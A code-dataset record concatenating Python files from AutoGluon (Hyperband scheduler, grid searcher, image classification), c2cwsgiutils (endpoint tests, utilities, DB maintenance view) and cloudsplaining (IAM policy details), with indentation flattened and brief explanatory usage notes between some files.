def _get_bracket(self, task_id):
bracket_id = self._task_info[str(task_id)]
return self._brackets[bracket_id], bracket_id
def on_task_report(self, task, result):
"""
This method is called by the reporter thread whenever a new metric
value is received. It returns a dictionary with all the information
needed for making decisions (e.g., stop / continue task, update
model, etc)
- task_continues: Should task continue or stop/pause?
- update_searcher: True if rung level (or max_t) is hit, at which point
the searcher should be updated
- next_milestone: If hit rung level < max_t, this is the subsequent
rung level (otherwise: None). Used for pending candidates
- bracket_id: Bracket in which the task is running
:param task: Only task.task_id is used
:param result: Current reported results from task
:return: See above
"""
action = False
update_searcher = True
next_milestone = None
bracket, bracket_id = self._get_bracket(task.task_id)
if result[self._time_attr] < self._max_t:
action, update_searcher, next_milestone = bracket.on_result(
task, result[self._time_attr], result[self._reward_attr])
# Special case: If config just reached the last milestone in
# the bracket and survived, next_milestone is equal to max_t
if action and update_searcher and (next_milestone is None):
next_milestone = self._max_t
if not action:
self._num_stopped += 1
return {
'task_continues': action,
'update_searcher': update_searcher,
'next_milestone': next_milestone,
'bracket_id': bracket_id}
def on_task_complete(self, task, result):
bracket, _ = self._get_bracket(task.task_id)
bracket.on_result(
task, result[self._time_attr], result[self._reward_attr])
self.on_task_remove(task)
def on_task_remove(self, task):
del self._task_info[str(task.task_id)]
def _sample_bracket(self):
return _sample_bracket(
num_brackets=len(self._brackets),
max_num_rungs=len(self._brackets[0]._rungs),
rf=self._reduction_factor)
def on_task_schedule(self):
# Sample bracket for task to be scheduled
bracket_id = self._sample_bracket()
# 'milestone' is first milestone the new config will get to
extra_kwargs = {
'bracket': bracket_id,
'milestone': self._brackets[bracket_id].get_first_milestone()}
return None, extra_kwargs
def snapshot_rungs(self, bracket_id):
return self._brackets[bracket_id].snapshot_rungs()
def resource_to_index(self, resource):
return map_resource_to_index(
resource, self._reduction_factor, self._min_t, self._max_t)
def __repr__(self):
reprstr = self.__class__.__name__ + '(' + \
'reward_attr: ' + self._reward_attr + \
', time_attr: ' + self._time_attr + \
', reduction_factor: ' + str(self._reduction_factor) + \
', max_t: ' + str(self._max_t) + \
', brackets: ' + str(self._brackets) + \
')'
return reprstr
class StoppingBracket(object):
"""Bookkeeping system to track the cutoffs.
Rungs are created in reversed order so that we can more easily find
the correct rung corresponding to the current iteration of the result.
"""
def __init__(self, min_t, max_t, reduction_factor, s):
self.rf = reduction_factor
MAX_RUNGS = int(np.log(max_t / min_t) / np.log(self.rf) - s + 1)
self._rungs = [(min_t * self.rf ** (k + s), dict())
for k in reversed(range(MAX_RUNGS))]
def cutoff(self, recorded):
if not recorded:
return None
return np.percentile(list(recorded.values()), (1 - 1 / self.rf) * 100)
def on_result(self, task, cur_iter, cur_rew):
"""
Decision on whether task may continue (action = True), or should be
stopped (action = False).
milestone_reached is a flag whether cur_iter coincides with a milestone.
If True, next_milestone is the next milestone after cur_iter, or None
if there is none.
:param task: Only need task.task_id
:param cur_iter: Current time_attr value of task
:param cur_rew: Current reward_attr value of task
:return: action, milestone_reached, next_milestone
"""
assert cur_rew is not None, \
"Reward attribute must be a numerical value, not None"
action = True
milestone_reached = False
next_milestone = None
task_key = str(task.task_id)
for milestone, recorded in self._rungs:
if not (cur_iter < milestone or task_key in recorded):
# Note: It is important for model-based searchers that
# milestones are reached exactly, not jumped over. In
# particular, if a future milestone is reported via
# register_pending, its reward value has to be passed
# later on via update.
assert cur_iter == milestone, \
"cur_iter = {} > {} = milestone. Make sure to report time attributes covering all milestones".format(
cur_iter, milestone)
milestone_reached = True
cutoff = self.cutoff(recorded)
if cutoff is not None and cur_rew < cutoff:
action = False
recorded[task_key] = cur_rew
break
next_milestone = milestone
return action, milestone_reached, next_milestone
def get_first_milestone(self):
return self._rungs[-1][0]
def snapshot_rungs(self):
return [(x[0], copy.copy(x[1])) for x in self._rungs]
def __repr__(self):
iters = " | ".join([
"Iter {:.3f}: {}".format(milestone, self.cutoff(recorded))
for milestone, recorded in self._rungs
])
return "Bracket: " + iters
```
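To make the rung bookkeeping above concrete, here is a small illustration (values chosen arbitrarily) that recomputes the milestone levels a `StoppingBracket` builds in its constructor; at each rung, `cutoff()` then stops any task whose reward falls below the `(1 - 1/rf)` percentile of the rewards recorded so far.
```python
# Illustration only: recomputes the rung levels with the constructor's formula.
import numpy as np

min_t, max_t, rf, s = 1, 100, 3, 0
max_rungs = int(np.log(max_t / min_t) / np.log(rf) - s + 1)
rungs = [min_t * rf ** (k + s) for k in reversed(range(max_rungs))]
print(rungs)  # [81, 27, 9, 3, 1] -- milestone levels in decreasing order
# get_first_milestone() returns the smallest level (1), and on_task_add()
# prepends max_t (100) because the top rung (81) lies below it.
```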
#### File: autogluon/searcher/grid_searcher.py
```python
__all__ = ['GridSearcher']
from .searcher import BaseSearcher
from sklearn.model_selection import ParameterGrid
class GridSearcher(BaseSearcher):
"""Grid Searcher that exhaustively tries all possible configurations.
This Searcher can only be used for discrete search spaces of type :class:`autogluon.space.Categorical`
Examples
--------
>>> import autogluon as ag
>>> @ag.args(
... x=ag.space.Categorical(0, 1, 2),
... y=ag.space.Categorical('a', 'b', 'c'))
>>> def train_fn(args, reporter):
... pass
>>> searcher = ag.searcher.GridSearcher(train_fn.cs)
>>> searcher.get_config()
Number of configurations for grid search is 9
{'x.choice': 2, 'y.choice': 2}
"""
def __init__(self, configspace, **kwargs):
super().__init__(
configspace, reward_attribute=kwargs.get('reward_attribute'))
param_grid = {}
hp_ordering = configspace.get_hyperparameter_names()
for hp in hp_ordering:
hp_obj = configspace.get_hyperparameter(hp)
hp_type = str(type(hp_obj)).lower()
assert 'categorical' in hp_type, \
'Only Categorical is supported, but {} is {}'.format(hp, hp_type)
param_grid[hp] = hp_obj.choices
self._configs = list(ParameterGrid(param_grid))
print('Number of configurations for grid search is {}'.format(len(self._configs)))
def __len__(self):
return len(self._configs)
def get_config(self):
""" Return new hyperparameter configuration to try next.
"""
return self._configs.pop()
```
#### File: task/image_classification/image_classification.py
```python
import logging
import os
import copy
import mxnet as mx
from .classifier import Classifier
from .dataset import get_dataset
from .nets import *
from .pipeline import train_image_classification
from .utils import *
from ..base import BaseTask, compile_scheduler_options, create_scheduler
from ...core import *
from ...core.loss import *
from ...core.optimizer import *
from ...scheduler.resource import get_cpu_count, get_gpu_count
from ...utils import update_params
__all__ = ['ImageClassification']
logger = logging.getLogger(__name__)
class ImageClassification(BaseTask):
"""AutoGluon Task for classifying images based on their content
"""
Classifier = Classifier
@staticmethod
def Dataset(path=None, name=None, train=True, input_size=224, crop_ratio=0.875, *args, **kwargs):
"""Dataset for AutoGluon image classification tasks.
May either be a :class:`autogluon.task.image_classification.ImageFolderDataset`, :class:`autogluon.task.image_classification.RecordDataset`,
or a popular dataset already built into AutoGluon ('mnist', 'fashionmnist', 'cifar10', 'cifar100', 'imagenet').
Parameters
----------
path : str, optional
The data location. If using :class:`ImageFolderDataset`,
image folder `path/to/the/folder` should be provided.
If using :class:`RecordDataset`, the `path/to/*.rec` should be provided.
name : str, optional
Which built-in dataset to use, will override all other options if specified.
The options are: 'mnist', 'fashionmnist', 'cifar', 'cifar10', 'cifar100', 'imagenet'
train : bool, optional, default = True
Whether this dataset should be used for training or validation.
input_size : int
The input image size.
crop_ratio : float
Center crop ratio (for evaluation only).
Returns
-------
Dataset object that can be passed to `task.fit()`, which is actually an :class:`autogluon.space.AutoGluonObject`.
To interact with such an object yourself, you must first call `Dataset.init()` to instantiate the object in Python.
"""
if name is None:
if path is None:
raise ValueError("Either `path` or `name` must be present in Dataset(). "
"If `name` is provided, it will override the rest of the arguments.")
return get_dataset(path=path, train=train, name=name,
input_size=input_size, crop_ratio=crop_ratio,
*args, **kwargs)
@staticmethod
def fit(dataset,
net=Categorical('ResNet50_v1b', 'ResNet18_v1b'),
optimizer=NAG(
learning_rate=Real(1e-3, 1e-2, log=True),
wd=Real(1e-4, 1e-3, log=True),
multi_precision=False
),
loss=SoftmaxCrossEntropyLoss(),
split_ratio=0.8,
batch_size=64,
input_size=224,
epochs=20,
final_fit_epochs=None,
ensemble=1,
metric='accuracy',
nthreads_per_trial=60,
ngpus_per_trial=1,
hybridize=True,
scheduler_options=None,
search_strategy='random',
search_options=None,
plot_results=False,
verbose=False,
time_limits=None,
resume=False,
output_directory='checkpoint/',
visualizer='none',
num_trials=2,
dist_ip_addrs=None,
auto_search=True,
lr_config=Dict(
lr_mode='cosine',
lr_decay=0.1,
lr_decay_period=0,
lr_decay_epoch='40,80',
warmup_lr=0.0,
warmup_epochs=0
),
tricks=Dict(
last_gamma=False,
use_pretrained=True,
use_se=False,
mixup=False,
mixup_alpha=0.2,
mixup_off_epoch=0,
label_smoothing=False,
no_wd=False,
teacher_name=None,
temperature=20.0,
hard_weight=0.5,
batch_norm=False,
use_gn=False),
**kwargs):
# TODO: ensemble and hybridize are not in docstring
"""
Fit image classification models to a given dataset.
Parameters
----------
dataset : str or :meth:`autogluon.task.ImageClassification.Dataset`
Training dataset containing images and their associated class labels.
Popular image datasets built into AutoGluon can be used by specifying their name as a string (options: ‘mnist’, ‘fashionmnist’, ‘cifar’, ‘cifar10’, ‘cifar100’, ‘imagenet’).
input_size : int
Size of images in the dataset (pixels).
net : str or :class:`autogluon.space.Categorical`
Which existing neural network models to consider as candidates.
optimizer : str or :class:`autogluon.space.AutoGluonObject`
Which optimizers to consider as candidates for learning the neural network weights.
batch_size : int
How many images to group in each mini-batch during gradient computations in training.
epochs: int
How many epochs to train the neural networks for at most.
final_fit_epochs: int, default None
Final fit epochs, the same number of epochs will be used as during the HPO if not specified.
metric : str or callable object
Evaluation metric by which predictions will be ultimately evaluated on test data.
loss : `mxnet.gluon.loss`
Loss function used during training of the neural network weights.
num_trials : int
Maximal number of hyperparameter configurations to try out.
split_ratio : float, default = 0.8
Fraction of dataset to use for training (rest of data is held-out for tuning hyperparameters).
The final returned model may be fit to all of the data (after hyperparameters have been selected).
time_limits : int
Approximately how long `fit()` should run for (wallclock time in seconds).
`fit()` will stop training new models after this amount of time has elapsed (but models which have already started training will continue to completion).
nthreads_per_trial : int
How many CPUs to use in each trial (ie. single training run of a model).
ngpus_per_trial : int
How many GPUs to use in each trial (ie. single training run of a model).
output_directory : str
Checkpoints of the search state are written to
os.path.join(output_directory, 'exp1.ag')
scheduler_options : dict
Extra arguments passed to __init__ of scheduler, to configure the
orchestration of training jobs during hyperparameter-tuning.
search_strategy : str
Which hyperparameter search algorithm to use.
Options include: 'random' (random search), 'skopt' (SKopt Bayesian optimization), 'grid' (grid search), 'hyperband' (Hyperband), 'rl' (reinforcement learner)
search_options : dict
Auxiliary keyword arguments to pass to the searcher that performs hyperparameter optimization.
resume : bool
If True, the hyperparameter search is started from state loaded from
os.path.join(output_directory, 'exp1.ag')
dist_ip_addrs : list
List of IP addresses corresponding to remote workers, in order to leverage distributed computation.
verbose : bool
Whether or not to print out intermediate information during training.
plot_results : bool
Whether or not to generate plots summarizing training process.
visualizer : str
Describes method to visualize training progress during `fit()`. Options: ['mxboard', 'tensorboard', 'none'].
auto_search : bool
If True, enables automatic suggestion of network types and hyper-parameter ranges adaptively based on provided dataset.
Returns
-------
:class:`autogluon.task.image_classification.Classifier` object which can make predictions on new data and summarize what happened during `fit()`.
Examples
--------
>>> from autogluon import ImageClassification as task
>>> dataset = task.Dataset(train_path='data/train',
>>> test_path='data/test')
>>> classifier = task.fit(dataset,
>>> net=ag.space.Categorical('resnet18_v1', 'resnet34_v1'),
>>> time_limits=time_limits,
>>> ngpus_per_trial=1,
>>> num_trials = 4)
>>> test_data = task.Dataset('~/data/test', train=False)
>>> test_acc = classifier.evaluate(test_data)
Bag of tricks used on the image classification dataset:
lr_config
----------
lr-mode : type=str, default='step'.
describes how learning rate should be adjusted over the course of training. Options include: 'cosine', 'poly'.
lr-decay : type=float, default=0.1.
decay rate of learning rate. default is 0.1.
lr-decay-period : type=int, default=0.
interval for periodic learning rate decays. default is 0 to disable.
lr-decay-epoch : type=str, default='10,20,30'.
epochs at which learning rate decays. epochs=40, default is 10, 20, 30.
warmup-lr : type=float, default=0.0.
starting warmup learning rate. default is 0.0.
warmup-epochs : type=int, default=0.
number of warmup epochs.
tricks
----------
last-gamma : default=True.
whether to init gamma of the last BN layer in each bottleneck to 0.
use-pretrained : default=True.
enable using pretrained model from gluon.
use_se : default=False.
use SE layers or not in resnext. default is false.
mixup : default=False.
whether train the model with mix-up. default is false.
mixup-alpha : type=float, default=0.2.
beta distribution parameter for mixup sampling, default is 0.2.
mixup-off-epoch : type=int, default=0.
how many last epochs to train without mixup, default is 0.
label-smoothing : default=True.
use label smoothing or not in training. default is false.
no-wd : default=True.
whether to remove weight decay on bias, and beta/gamma for batchnorm layers.
teacher : type=str, default=None.
teacher model for distillation training
temperature : type=float, default=20.
temperature parameter for distillation teacher model
hard-weight : type=float, default=0.5.
weight for the loss of one-hot label for distillation training
batch-norm : default=True.
enable batch normalization or not in vgg. default is false.
use-gn : default=False.
whether to use group norm.
"""
checkpoint = os.path.join(output_directory, 'exp1.ag')
if auto_search:
# The strategies can be injected here, for example: automatic suggest some hps
# based on the dataset statistics
net = auto_suggest_network(dataset, net)
nthreads_per_trial = get_cpu_count() if nthreads_per_trial > get_cpu_count() else nthreads_per_trial
ngpus_per_trial = get_gpu_count() if ngpus_per_trial > get_gpu_count() else ngpus_per_trial
final_fit_epochs = final_fit_epochs if final_fit_epochs else epochs
train_image_classification.register_args(
dataset=dataset,
net=net,
optimizer=optimizer,
loss=loss,
metric=metric,
num_gpus=ngpus_per_trial,
split_ratio=split_ratio,
batch_size=batch_size,
input_size=input_size,
epochs=epochs,
final_fit_epochs=final_fit_epochs,
verbose=verbose,
num_workers=nthreads_per_trial,
hybridize=hybridize,
final_fit=False,
tricks=tricks,
lr_config=lr_config
)
# Backward compatibility:
grace_period = kwargs.get('grace_period')
if grace_period is not None:
if scheduler_options is None:
scheduler_options = {'grace_period': grace_period}
else:
assert 'grace_period' not in scheduler_options, \
"grace_period appears both in scheduler_options and as direct argument"
logger.warning(
"grace_period is deprecated, use "
"scheduler_options={'grace_period': ...} instead")
scheduler_options = copy.copy(scheduler_options)
scheduler_options['grace_period'] = grace_period
scheduler_options = compile_scheduler_options(
scheduler_options=scheduler_options,
search_strategy=search_strategy,
search_options=search_options,
nthreads_per_trial=nthreads_per_trial,
ngpus_per_trial=ngpus_per_trial,
checkpoint=checkpoint,
num_trials=num_trials,
time_out=time_limits,
resume=resume,
visualizer=visualizer,
time_attr='epoch',
reward_attr='classification_reward',
dist_ip_addrs=dist_ip_addrs,
epochs=epochs)
results = BaseTask.run_fit(
train_image_classification, search_strategy, scheduler_options,
plot_results=plot_results)
args = sample_config(train_image_classification.args, results['best_config'])
kwargs = {'num_classes': results['num_classes'], 'ctx': mx.cpu(0)}
model = get_network(args.net, **kwargs)
multi_precision = optimizer.kwvars['multi_precision'] if 'multi_precision' in optimizer.kwvars else False
update_params(model, results.pop('model_params'), multi_precision)
if ensemble > 1:
models = [model]
scheduler = create_scheduler(
train_image_classification, search_strategy, scheduler_options)
for i in range(1, ensemble):
resultsi = scheduler.run_with_config(results['best_config'])
kwargs = {
'num_classes': resultsi['num_classes'], 'ctx': mx.cpu(0)}
model = get_network(args.net, **kwargs)
update_params(
model, resultsi.pop('model_params'), multi_precision)
models.append(model)
model = Ensemble(models)
results.pop('args')
args.pop('optimizer')
args.pop('dataset')
args.pop('loss')
return Classifier(model, results, default_val_fn, checkpoint, args)
```
{
"source": "jhutchings1/c2cwsgiutils",
"score": 2
}
#### File: tests/tests/test_broadcast.py
```python
def test_broadcast_reconfig(app_connection):
response = app_connection.get_json("broadcast", cors=False)
assert response == [42] # only one worker
```
#### File: tests/tests/test_debug.py
```python
import json
import time
def test_stacks(app_connection):
stacks = app_connection.get_json("c2c/debug/stacks", params={"secret": "changeme"}, cors=False)
_check_stacks(stacks)
def _check_stacks(stacks):
print("stacks=" + json.dumps(stacks, indent=4))
assert "c2cwsgiutils/debug" in json.dumps(stacks)
def test_header_auth(app_connection):
stacks = app_connection.get_json("c2c/debug/stacks", headers={"X-API-Key": "changeme"}, cors=False)
_check_stacks(stacks)
def test_no_auth(app_connection):
app_connection.get_json("c2c/debug/stacks", expected_status=403, cors=False)
def test_memory(app_connection):
memory = app_connection.get_json("c2c/debug/memory", params={"secret": "changeme"}, cors=False)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
def test_memory_analyze_functions(app_connection):
class_ = "builtins.function"
memory = app_connection.get_json(
"c2c/debug/memory", params={"secret": "changeme", "analyze_type": class_}, cors=False
)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
assert class_ in memory[0]
assert "modules" in memory[0][class_]
assert "timeout" not in memory[0][class_]
def test_memory_analyze_other(app_connection):
class_ = "gunicorn.six.MovedAttribute"
memory = app_connection.get_json(
"c2c/debug/memory", params={"secret": "changeme", "analyze_type": class_}, cors=False
)
print("memory=" + json.dumps(memory, indent=4))
assert len(memory) == 1
assert class_ in memory[0]
assert "biggest_objects" in memory[0][class_]
assert "timeout" not in memory[0][class_]
def test_sleep(app_connection):
start_time = time.monotonic()
app_connection.get(
"c2c/debug/sleep", params={"secret": "changeme", "time": "0.1"}, expected_status=204, cors=False
)
assert time.monotonic() - start_time > 0.1
def test_time(app_connection):
time_ = app_connection.get_json("c2c/debug/time", cors=False)
assert time_["timezone"] == "UTC" # run in docker -> UTC
def test_headers(app_connection):
response = app_connection.get_json(
"c2c/debug/headers", params={"secret": "changeme"}, headers={"X-Toto": "42"}, cors=False
)
print("response=" + json.dumps(response, indent=4))
assert response["headers"]["X-Toto"] == "42"
def _check_leak_there(response):
print("response=" + json.dumps(response, indent=4))
leaked = {v[0]: v[2] for v in response}
assert "c2cwsgiutils_app.services.LeakedObject" in leaked, leaked.keys()
assert leaked["c2cwsgiutils_app.services.LeakedObject"] == 1
def test_memory_diff(app_connection):
response = app_connection.get_json(
"c2c/debug/memory_diff", params={"secret": "changeme", "path": "/api/ping?toto=tutu"}, cors=False
)
_check_leak_there(response)
def test_memory_diff_deprecated(app_connection):
response = app_connection.get_json(
"c2c/debug/memory_diff/api/ping", params={"secret": "changeme"}, cors=False
)
_check_leak_there(response)
def test_error(app_connection):
app_connection.get_json(
"c2c/debug/error", params={"secret": "changeme", "status": "500"}, expected_status=500, cors=False
)
def test_memory_maps(app_connection):
memory = app_connection.get_json("c2c/debug/memory_maps", params={"secret": "changeme"}, cors=False)
print("memory_maps=" + json.dumps(memory, indent=4))
assert len(memory) > 0
def test_show_refs(app_connection):
refs = app_connection.get(
"c2c/debug/show_refs.dot",
params=dict(
secret="changeme",
analyze_type="gunicorn.app.wsgiapp.WSGIApplication",
max_depth="3",
too_many="10",
),
cors=False,
)
print("refs=" + refs)
assert "WSGIApplication" in refs
```
#### File: tests/tests/test_stats.py
```python
from c2cwsgiutils.acceptance import retry
@retry(Exception)
def test_ok(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
app_connection.get_json("hello") # to be sure we have some stats
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["render/group=2/method=GET/route=hello/status=200"]["nb"] == 1
assert stats["timers"]["route/group=2/method=GET/route=hello/status=200"]["nb"] == 1
assert stats["timers"]["sql/read_hello"]["nb"] == 1
assert stats["timers"]["sql/query=SELECT FROM hello LIMIT ?"]["nb"] == 1
assert stats["gauges"]["test/gauge_s/toto=tutu/value=24"] == 42
assert stats["counters"]["test/counter"] == 1
def test_server_timing(app_connection):
r = app_connection.get_raw("hello")
assert "Server-Timing" in r.headers
def test_requests(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
app_connection.get_json("tracking/1")
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["requests/host=localhost/method=GET/port=8080/scheme=http/status=200"]["nb"] == 1
def test_redis(app_connection):
# reset the stats to be sure where we are at
app_connection.get_json("c2c/stats.json?reset=1", cors=False)
# that sends a few PUBLISH to redis
app_connection.get_json("c2c/debug/stacks", params={"secret": "changeme"}, cors=False)
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["timers"]["redis/cmd=PUBLISH/success=1"]["nb"] >= 1
def test_version(app_connection):
app_connection.get_json("c2c/health_check", params={"checks": "version", "max_level": "10"}, cors=False)
version = app_connection.get_json("c2c/versions.json", cors=False)
stats = app_connection.get_json("c2c/stats.json", cors=False)
print(stats)
assert stats["counters"]["version/version=" + version["main"]["git_hash"]] == 1
```
#### File: c2cwsgiutils/acceptance/utils.py
```python
import logging
import os
import time
from typing import Callable, Any, Tuple, List
import boltons.iterutils
import netifaces
import requests
import pytest
LOG = logging.getLogger(__name__)
def in_docker() -> bool:
return os.environ.get("DOCKER_RUN", "0") == "1"
DOCKER_GATEWAY = netifaces.gateways()[netifaces.AF_INET][0][0] if in_docker() else "localhost"
DEFAULT_TIMEOUT = 60
def wait_url(url: str, timeout: float = DEFAULT_TIMEOUT) -> None:
def what() -> bool:
LOG.info("Trying to connect to %s... ", url)
r = requests.get(url, timeout=timeout)
if r.status_code == 200:
LOG.info("%s service started", url)
return True
else:
return False
retry_timeout(what, timeout=timeout)
def retry_timeout(what: Callable[[], Any], timeout: float = DEFAULT_TIMEOUT, interval: float = 0.5) -> Any:
timeout = time.monotonic() + timeout
while True:
error = ""
try:
ret = what()
if ret:
return ret
except NameError:
raise
except Exception as e: # pylint: disable=broad-except
error = str(e)
LOG.info(" Failed: %s", e)
if time.monotonic() > timeout:
assert False, "Timeout: " + error
time.sleep(interval)
skipIfCI = pytest.mark.skipif(os.environ.get("IN_CI", "0") == "1", reason="Not running on CI")
def approx(struct: Any, **kwargs: Any) -> Any:
"""
Make float values in deep structures approximative. See pytest.approx
"""
if isinstance(struct, float):
return pytest.approx(struct, **kwargs)
def visit(_path: List[str], key: Any, value: Any) -> Tuple[Any, Any]:
if isinstance(value, float):
value = pytest.approx(value, **kwargs)
return key, value
return boltons.iterutils.remap(struct, visit)
```
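The helpers above are small but easy to misuse, so here is a short usage sketch. It is illustrative only: the health-check URL, the polled condition, and the nested data are assumptions rather than part of the module, and the import path simply mirrors the file layout shown in the header.
```python
# Illustrative usage of wait_url / retry_timeout / approx (URL and data are made up).
from c2cwsgiutils.acceptance.utils import wait_url, retry_timeout, approx

# Block until the (assumed) service answers HTTP 200 on its health check.
wait_url("http://localhost:8080/c2c/health_check", timeout=30)

# Poll an arbitrary condition until it returns a truthy value or the timeout expires.
attempts = {"n": 0}

def ready() -> bool:
    attempts["n"] += 1
    return attempts["n"] >= 3  # succeeds on the third try

retry_timeout(ready, timeout=5, interval=0.1)

# Compare nested structures while tolerating floating-point noise.
actual = {"stats": [{"mean": 0.1 + 0.2}]}
assert actual == approx({"stats": [{"mean": 0.3}]})
```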
#### File: c2cwsgiutils/broadcast/interface.py
```python
from abc import abstractmethod
from typing import Optional, Callable, Mapping, Any, List
class BaseBroadcaster:
"""
Interface definition for message broadcasting implementation
"""
@abstractmethod
def subscribe(self, channel: str, callback: Callable[..., Any]) -> None:
pass # pragma: no cover
@abstractmethod
def unsubscribe(self, channel: str) -> None:
pass # pragma: no cover
@abstractmethod
def broadcast(
self, channel: str, params: Mapping[str, Any], expect_answers: bool, timeout: float
) -> Optional[List[Any]]:
pass # pragma: no cover
```
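To make the abstract interface concrete, below is a minimal, hypothetical in-process implementation. It is only a sketch (the package ships its own local and Redis-backed broadcasters); it just illustrates how `subscribe`, `unsubscribe`, `broadcast`, and `expect_answers` are meant to fit together.
```python
# Hypothetical in-process implementation of BaseBroadcaster (sketch, not the shipped one).
from typing import Any, Callable, Dict, List, Mapping, Optional

from c2cwsgiutils.broadcast.interface import BaseBroadcaster

class InProcessBroadcaster(BaseBroadcaster):
    def __init__(self) -> None:
        self._subscribers: Dict[str, List[Callable[..., Any]]] = {}

    def subscribe(self, channel: str, callback: Callable[..., Any]) -> None:
        self._subscribers.setdefault(channel, []).append(callback)

    def unsubscribe(self, channel: str) -> None:
        self._subscribers.pop(channel, None)

    def broadcast(
        self, channel: str, params: Mapping[str, Any], expect_answers: bool, timeout: float
    ) -> Optional[List[Any]]:
        # Everything runs in-process, so the timeout is not needed here.
        answers = [callback(**params) for callback in self._subscribers.get(channel, [])]
        return answers if expect_answers else None
```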
#### File: c2cwsgiutils/c2cwsgiutils/db_maintenance_view.py
```python
import logging
from typing import Mapping, Any, Optional, cast
import pyramid.request
from c2cwsgiutils import _utils, auth, broadcast, db
LOG = logging.getLogger(__name__)
CONFIG_KEY = "c2c.db_maintenance_view_enabled"
ENV_KEY = "C2C_DB_MAINTENANCE_VIEW_ENABLED"
REDIS_PREFIX = "c2c_db_maintenance_"
def install_subscriber(config: pyramid.config.Configurator) -> None:
"""
Install the view to configure the loggers, if configured to do so.
"""
if auth.is_enabled(config, ENV_KEY, CONFIG_KEY):
config.add_route(
"c2c_db_maintenance", _utils.get_base_path(config) + r"/db/maintenance", request_method="GET"
)
config.add_view(_db_maintenance, route_name="c2c_db_maintenance", renderer="fast_json", http_cache=0)
_restore(config)
LOG.info("Enabled the /db/maintenance API")
def _db_maintenance(request: pyramid.request.Request) -> Mapping[str, Any]:
auth.auth_view(request)
readonly_param = cast(str, request.params.get("readonly"))
if readonly_param is not None:
readonly = readonly_param.lower() == "true"
LOG.critical("Readonly DB status changed from %s to %s", db.force_readonly, readonly)
_set_readonly(value=readonly)
_store(request.registry.settings, readonly)
return {"status": 200, "readonly": readonly}
else:
readonly = _get_redis_value(request.registry.settings)
if readonly is not None:
readonly = readonly == "true"
return {"status": 200, "current_readonly": readonly}
@broadcast.decorator(expect_answers=True)
def _set_readonly(value: bool) -> bool:
db.force_readonly = value
return True
def _restore(config: pyramid.config.Configurator) -> None:
try:
readonly = _get_redis_value(config.get_settings())
if readonly is not None:
LOG.debug("Restoring readonly DB status to %s", readonly)
db.force_readonly = readonly == "true"
except ImportError:
pass # don't have redis
except Exception: # pylint: disable=broad-except
# survive an error since crashing now can have bad consequences for the service. :/
LOG.error("Cannot restore readonly DB status.", exc_info=True)
def _store(settings: Mapping[str, Any], readonly: bool) -> None:
try:
import redis
redis_url = _utils.env_or_settings(settings, broadcast.REDIS_ENV_KEY, broadcast.REDIS_CONFIG_KEY)
if redis_url:
con = redis.Redis.from_url(redis_url, socket_timeout=3, decode_responses=True)
con.set(REDIS_PREFIX + "force_readonly", "true" if readonly else "false")
except ImportError:
pass
def _get_redis_value(settings: Mapping[str, Any]) -> Optional[str]:
import redis
redis_url = _utils.env_or_settings(settings, broadcast.REDIS_ENV_KEY, broadcast.REDIS_CONFIG_KEY)
if redis_url is None:
return None
con = redis.Redis.from_url(redis_url, socket_timeout=3, decode_responses=True)
value = con.get(REDIS_PREFIX + "force_readonly")
return str(value) if value else None
```
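As a rough illustration of how this view is driven from the outside, the snippet below toggles and then reads the readonly flag over HTTP. The host, port, and secret are assumptions that mirror the values used elsewhere in these tests; they are not defined by the module above.
```python
# Hypothetical client-side usage of the /c2c/db/maintenance view (host/port/secret assumed).
import requests

BASE = "http://localhost:8080/c2c"

# Ask every process to switch the DB layer to readonly mode (propagated via broadcast).
resp = requests.get(f"{BASE}/db/maintenance", params={"secret": "changeme", "readonly": "true"})
print(resp.json())  # expected shape: {"status": 200, "readonly": True}

# Read back the stored value without changing it.
resp = requests.get(f"{BASE}/db/maintenance", params={"secret": "changeme"})
print(resp.json())  # expected shape: {"status": 200, "current_readonly": ...}
```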
#### File: c2cwsgiutils/stats_pyramid/_views.py
```python
from typing import cast
import pyramid.config
from c2cwsgiutils import _utils, stats
def init(config: pyramid.config.Configurator) -> None:
config.add_route(
"c2c_read_stats_json", _utils.get_base_path(config) + r"/stats.json", request_method="GET"
)
memory_backend = cast(stats.MemoryBackend, stats.BACKENDS["memory"])
config.add_view(
memory_backend.get_stats, route_name="c2c_read_stats_json", renderer="fast_json", http_cache=0
)
```
#### File: c2cwsgiutils/tests/test_loader.py
```python
from unittest.mock import patch, mock_open
from pyramid.scripts.common import get_config_loader
@patch(
"paste.deploy.loadwsgi.open",
mock_open(
read_data="""
[app:main]
variable = %(VARIABLE)s
"""
),
)
@patch.dict("c2cwsgiutils.loader.os.environ", {"VARIABLE": "value"})
def test_loader():
loader = get_config_loader("c2c:///app/production.ini")
assert 'c2cwsgiutils.loader.Loader(uri="c2c:///app/production.ini")' == repr(loader)
assert "value" == loader._get_defaults()["VARIABLE"] # pylint: disable=W0212
assert "value" == loader.get_settings("app:main")["variable"]
``` |
{
"source": "jhutchings1/cloudsplaining",
"score": 2
} |
#### File: cloudsplaining/scan/policy_detail.py
```python
from policy_sentry.util.arns import get_account_from_arn
from cloudsplaining.scan.policy_document import PolicyDocument
from cloudsplaining.shared.utils import get_full_policy_path
class PolicyDetails:
"""
Holds PolicyDetail objects. This is sourced from the 'Policies' section of the Authz file - whether they are AWS managed or customer managed.
"""
def __init__(self, policy_details):
self.policy_details = []
for policy_detail in policy_details:
self.policy_details.append(PolicyDetail(policy_detail))
# pylint: disable=too-many-instance-attributes
class PolicyDetail:
"""
Contains information about an IAM policy, including the policy document.
https://docs.aws.amazon.com/IAM/latest/APIReference/API_PolicyDetail.html
"""
def __init__(self, policy_detail):
# Store the Raw JSON data from this for safekeeping
self.policy_detail = policy_detail
# Store the attributes per Policy item
self.policy_name = policy_detail.get("PolicyName")
self.policy_id = policy_detail.get("PolicyId")
self.arn = policy_detail.get("Arn")
self.path = policy_detail.get("Path")
self.default_version_id = policy_detail.get("DefaultVersionId")
self.attachment_count = policy_detail.get("AttachmentCount")
self.permissions_boundary_usage_count = policy_detail.get(
"PermissionsBoundaryUsageCount"
)
self.is_attachable = policy_detail.get("IsAttachable")
self.create_date = policy_detail.get("CreateDate")
